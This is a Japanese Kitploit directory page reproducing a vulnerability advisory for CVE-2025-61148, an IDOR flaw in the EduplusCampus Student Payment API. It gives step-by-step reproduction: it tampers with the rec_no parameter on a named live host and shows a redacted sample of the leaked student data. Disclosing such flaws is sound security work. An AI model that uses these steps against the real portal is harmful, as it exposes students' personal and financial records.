Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-61148 — 脆弱性は Student Payment API に存在します。このアプリケーションは、領収書を要求するユーザーがそれを閲覧する権限を有しているかどうかを適切に検証できていません。API リクエスト内の rec_no パラメータを変更することで、攻撃者は他のユーザーの領収書にアクセスできます。 | Kitploit
ツール/GitHubGitHub/sharma19d/cve-2025-61148
脆弱性分析ウェブアプリケーション悪用APIセキュリティテスト情報収集ペネトレーションテスト学習と教育
GitHubsharma19d/cve-2025-61148

CVE-2025-61148

脆弱性は Student Payment API に存在します。このアプリケーションは、領収書を要求するユーザーがそれを閲覧する権限を有しているかどうかを適切に検証できていません。API リクエスト内の rec_no パラメータを変更することで、攻撃者は他のユーザーの領収書にアクセスできます。

リポジトリを見る
1810ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-61148

この脆弱性は Student Payment API に存在します。このアプリケーションは、領収書を要求するユーザーがその領収書を閲覧する権限があるかどうかを適切に検証していません。攻撃者は API リクエスト内の rec_no パラメータを変更することで、他のユーザーの領収書にアクセスできます。

CVE-2025-61148: EduplusCampus Student Payment API における IDOR

CVE ID: CVE-2025-61148 脆弱性タイプ: Insecure Direct Object Reference (IDOR) 影響を受ける製品: EduplusCampus 影響を受けるエンドポイント: /student/get-receipt 研究者: Vinay Sharma

概要

EduplusCampus 学生ポータル(バージョン 3.0.1)に、重大な Insecure Direct Object Reference (IDOR) の脆弱性が特定されました。この脆弱性により、認証済みユーザーが API リクエスト内の rec_no パラメータを変更することで、他の学生の機密性の高い個人情報および財務記録にアクセスできます。

影響

悪用に成功すると、攻撃者は以下を取得できます:

  • 氏名と学籍番号
  • 支払金額と支払日
  • 取引 ID (TID) と銀行口座情報
  • 個人識別情報 (PII)

脆弱性の詳細

このアプリケーションは、支払い領収書を要求するユーザーの認可を適切に検証していません。rec_no パラメータは連番または推測可能であり、サーバーは要求された番号に対応する領収書の詳細を、現在ログインしているユーザーのものであるかどうかを確認せずに返します。

再現手順

  1. 学生ポータルにログインします。
  2. 領収書発行セクションに移動します。
  3. /student/get-receipt への POST リクエストをインターセプトします。
  4. JSON 本文内の rec_no パラメータを見つけます。
  5. rec_no の値を別の有効な領収書番号に変更します(例: PCUF-232025 を PCUF-231824 に変更)。
  6. リクエストを送信します。
  7. サーバーは、その領収書番号に関連付けられた学生の個人情報および財務情報を返します。
画像 画像

リクエスト例

POST /student/get-receipt HTTP/1.1
Host: student.edupluscampus.com
Content-Type: application/json
Authorization: Bearer <token>

{
    "rec_no": "PCUF-233012"
}

### Leaked DATA Example:
{
    "fullname": "REDACTED_NAME",
    "rollno": "CSE2019XXX",
    "component_total_amount": 55000.0,
    "trans_list": [
        {
            "date": "21-Oct-2024",
            "mode": "Online",
            "amount": 55000.0,
            "tid": "42951XXXX"
        }
    ]
}

ベンダー情報

  • ベンダー: EduplusCampus
  • 製品: EduplusCampus Student Portal / Student Payment API

影響を受けるバージョン

  • バージョン: EduplusCampus 3.0.1

発見者

  • Vinay Sharma - セキュリティ研究者
ツールをダウンロード